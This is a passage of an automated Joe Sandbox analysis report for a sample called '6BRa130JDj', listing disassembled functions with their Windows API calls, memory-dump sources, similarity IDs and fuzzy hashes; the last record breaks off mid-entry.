                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2364364464-0
                                                                                                                    • Opcode ID: 986d7fbace717d0a05bbd8b73ab0b95ff0b7031892430b8b55cf8eae46a6db5b
                                                                                                                    • Instruction ID: 18a7bd0e5dcbf1f404579c1f740916aa660782048dc20927f70f3bddab3d4f4e
                                                                                                                    • Opcode Fuzzy Hash: 986d7fbace717d0a05bbd8b73ab0b95ff0b7031892430b8b55cf8eae46a6db5b
                                                                                                                    • Instruction Fuzzy Hash: 2E819E716043119FD721EF28D886F6AB7E9AF48750F04881DFA999B292DB70AC50CF81
                                                                                                                    Function 00330037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 00330E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0032FDAD,?,?), ref: 00330E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003300FD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0033013C
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00330183
                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 003301AF
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003301BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3440857362-0
                                                                                                                    • Opcode ID: dce4316dfafa6a37634004f86ca8c084dd6b2f11473ced5464fca4606e366ada
                                                                                                                    • Instruction ID: aec43a1cc65d35a7a4c00074340a26bccf075bca658063e299e509d6106b8a98
                                                                                                                    • Opcode Fuzzy Hash: dce4316dfafa6a37634004f86ca8c084dd6b2f11473ced5464fca4606e366ada
                                                                                                                    • Instruction Fuzzy Hash: 74516D31618204AFC719EF58CC91FAAB7E9FF84314F44492DF5968B2A2DB31E914CB52
                                                                                                                    Function 0032D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0032D927
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0032D9AA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0032D9C6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0032DA07
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0032DA21
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00317896,?,?,00000000), ref: 002B5A2C
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00317896,?,?,00000000,?,?), ref: 002B5A50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 327935632-0
                                                                                                                    • Opcode ID: 86b8e107355296e4d6dd7a1b81df42f6af5bddd76a988e7668f1c99fa1ad5de5
                                                                                                                    • Instruction ID: 3edb3d5299cdfb1625738ff3122f545b8719379e57fd3ec1a20fda9674c626b5
                                                                                                                    • Opcode Fuzzy Hash: 86b8e107355296e4d6dd7a1b81df42f6af5bddd76a988e7668f1c99fa1ad5de5
                                                                                                                    • Instruction Fuzzy Hash: CE512635A04619DFCB01EFA8D4849ADB7B8FF09324B05C065E955AB322D730ED95CF90
                                                                                                                    Function 0031E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0031E61F
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0031E648
                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0031E687
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0031E6AC
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0031E6B4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1389676194-0
                                                                                                                    • Opcode ID: 5a52bba8b016464c048665cc2da639b4588ffcaeffb287999beb0ca7c299f848
                                                                                                                    • Instruction ID: f653d88d8cf88de61cef11702cc9a2d52528f6cfb8884dbe3a911fde99a9f045
                                                                                                                    • Opcode Fuzzy Hash: 5a52bba8b016464c048665cc2da639b4588ffcaeffb287999beb0ca7c299f848
                                                                                                                    • Instruction Fuzzy Hash: 6E511835A10205DFCB05EF64C981AAEBBF5EF09354F1480A9E909AB362CB31ED61DF50
                                                                                                                    Function 0033A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: eab766dfcf347441f3b8a14d2cd4e68b00d867cca44ba0a6be2484615082dc1f
                                                                                                                    • Instruction ID: 99654222d14ec6436aea23eb57ce1dddef36ce80987a1e4dc578f5aee8e04991
                                                                                                                    • Opcode Fuzzy Hash: eab766dfcf347441f3b8a14d2cd4e68b00d867cca44ba0a6be2484615082dc1f
                                                                                                                    • Instruction Fuzzy Hash: E341F635D04904BFD726DF28CCC9FAABBACEB09310F160265F896A72E1C770AD41DA51
                                                                                                                    Function 002B2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 002B2357
                                                                                                                    • ScreenToClient.USER32(003757B0,?), ref: 002B2374
                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 002B2399
                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 002B23A7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210589936-0
                                                                                                                    • Opcode ID: 3c2d0bfd65795f2f7fd6699d06d7b4dfd7babbff9ae1db7f671668f320069ff3
                                                                                                                    • Instruction ID: da1627336276c3330cbfe6e5587987c3a413ad1adbaf1ec756d74faca3763bb8
                                                                                                                    • Opcode Fuzzy Hash: 3c2d0bfd65795f2f7fd6699d06d7b4dfd7babbff9ae1db7f671668f320069ff3
                                                                                                                    • Instruction Fuzzy Hash: 9E41A335914206FFCF169F69CC85AE9BBB4FB05360F604355F829962A0C7349DA4DF90
                                                                                                                    Function 003063AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003063E7
                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00306433
                                                                                                                    • TranslateMessage.USER32(?), ref: 0030645C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00306466
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00306475
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2108273632-0
                                                                                                                    • Opcode ID: a4c967bc7504407236bd022b08a9956bcfcc83915accf77fbcaea4c30ec487bc
                                                                                                                    • Instruction ID: 7f0e754de742553ecda3e8cb8a41599efacc7e5d028aee03b6cc23d7c1104e10
                                                                                                                    • Opcode Fuzzy Hash: a4c967bc7504407236bd022b08a9956bcfcc83915accf77fbcaea4c30ec487bc
                                                                                                                    • Instruction Fuzzy Hash: 64310A31A01642AFDB3BCF71CC96BB67BACAB01310F550169E425C30F5E77594A9D7A0
                                                                                                                    Function 00308A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00308A30
                                                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00308ADA
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00308AE2
                                                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00308AF0
                                                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00308AF8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3382505437-0
                                                                                                                    • Opcode ID: a53c5673f4d1bd9c40210ecd85f287efd384c25d1a68cdab791a07ddd89a3f8a
                                                                                                                    • Instruction ID: 9ff2100552f734656a58ffcd97da8af01c3a95be75d6b21fd14b8b2b50d4bbae
                                                                                                                    • Opcode Fuzzy Hash: a53c5673f4d1bd9c40210ecd85f287efd384c25d1a68cdab791a07ddd89a3f8a
                                                                                                                    • Instruction Fuzzy Hash: EA310071A00219EFCF00CFA8D98DA9E7BB9EB04315F10822AF865EA1D0C7B09914CB90
                                                                                                                    Function 0030B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 0030B204
                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0030B221
                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0030B259
                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0030B27F
                                                                                                                    • _wcsstr.LIBCMT ref: 0030B289
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3902887630-0
                                                                                                                    • Opcode ID: b8738ede55243f5ffd0eca486395ed785ca5cee94a0eaf0382f25398cdef0dae
                                                                                                                    • Instruction ID: 8faa5625be83c1017df39059c4bbbc3f181ec166b41a14c9d26c5fb78e1ca7ed
                                                                                                                    • Opcode Fuzzy Hash: b8738ede55243f5ffd0eca486395ed785ca5cee94a0eaf0382f25398cdef0dae
                                                                                                                    • Instruction Fuzzy Hash: BE212931605200BBEB169B79DC59E7FBBACDF49710F01813AF804DA1E1EF61DC509660
                                                                                                                    Function 0033B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0033B192
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0033B1B7
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0033B1CF
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0033B1F8
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00320E90,00000000), ref: 0033B216
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2294984445-0
                                                                                                                    • Opcode ID: fde1915d927970345e349df94a38371140fe153b872df766c3dcf18c489d69df
                                                                                                                    • Instruction ID: e301e6de250ac920d5bb80360f7163b30aaefe1a89e8dd2031f42a90e3d679df
                                                                                                                    • Opcode Fuzzy Hash: fde1915d927970345e349df94a38371140fe153b872df766c3dcf18c489d69df
                                                                                                                    • Instruction Fuzzy Hash: 5F219171E10655EFCB269F389C84A6AB7A8FB05361F124B28FA36D71E0D73098508B90
                                                                                                                    Function 00309307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00309320
                                                                                                                      • Part of subcall function 002B7BCC: _memmove.LIBCMT ref: 002B7C06
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00309352
                                                                                                                    • __itow.LIBCMT ref: 0030936A
                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00309392
                                                                                                                    • __itow.LIBCMT ref: 003093A3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2983881199-0
                                                                                                                    • Opcode ID: 3054bda6750122cd8814df3a21bec56e39035004611d723fdc75d1f1f375a11c
                                                                                                                    • Instruction ID: 81d582f3dd84934649199fb155db14eaec9460dbac2de913500746feade4971c
                                                                                                                    • Opcode Fuzzy Hash: 3054bda6750122cd8814df3a21bec56e39035004611d723fdc75d1f1f375a11c
                                                                                                                    • Instruction Fuzzy Hash: FB21DA35B02204ABDB129B649C96FEF7BADEB88710F044066F905DB1D2D670CD518F91
                                                                                                                    Function 00325A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(00000000), ref: 00325A6E
                                                                                                                    • GetForegroundWindow.USER32 ref: 00325A85
                                                                                                                    • GetDC.USER32(00000000), ref: 00325AC1
                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00325ACD
                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00325B08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4156661090-0
                                                                                                                    • Opcode ID: c8e3228be9b213c08453514e44adab907a7d4109090d0548524ae276e420b712
                                                                                                                    • Instruction ID: 3f74aeaf8213db85ff9f2d1847549747af3de84653fe7a0e4fd79f481f94c9ed
                                                                                                                    • Opcode Fuzzy Hash: c8e3228be9b213c08453514e44adab907a7d4109090d0548524ae276e420b712
                                                                                                                    • Instruction Fuzzy Hash: D421A135A00504AFD705EF65EC89A9ABBF9EF48350F148079F80997362CB34ED40CB90
                                                                                                                    Function 002B12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 002B134D
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 002B135C
                                                                                                                    • BeginPath.GDI32(?), ref: 002B1373
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 002B139C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: 0dc3598a3b94bc5110342bc01b45d8f7a0d1f18fa4fc5d8ca67e31ef5468e473
                                                                                                                    • Instruction ID: a244b01edc1dc6d5af31e8905cb866aafd3954d6cec5391e6bd1e52d225010a7
                                                                                                                    • Opcode Fuzzy Hash: 0dc3598a3b94bc5110342bc01b45d8f7a0d1f18fa4fc5d8ca67e31ef5468e473
                                                                                                                    • Instruction Fuzzy Hash: 14217F30D20609EFDB268F65DD447A93BECEB00351F98426AE814961B1E3B098F1CF51
                                                                                                                    Function 00314A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00314ABA
                                                                                                                    • __beginthreadex.LIBCMT ref: 00314AD8
                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00314AED
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00314B03
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00314B0A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3824534824-0
                                                                                                                    • Opcode ID: 3c9c13580fda1005ad2b2ae4e6716d4d9e4e57fb8296fcf9ba0b3c52d7e1f558
                                                                                                                    • Instruction ID: 0a604ecbc05941d590150c55b4542fe5e60ef3e142d17992e4ab097eb414595d
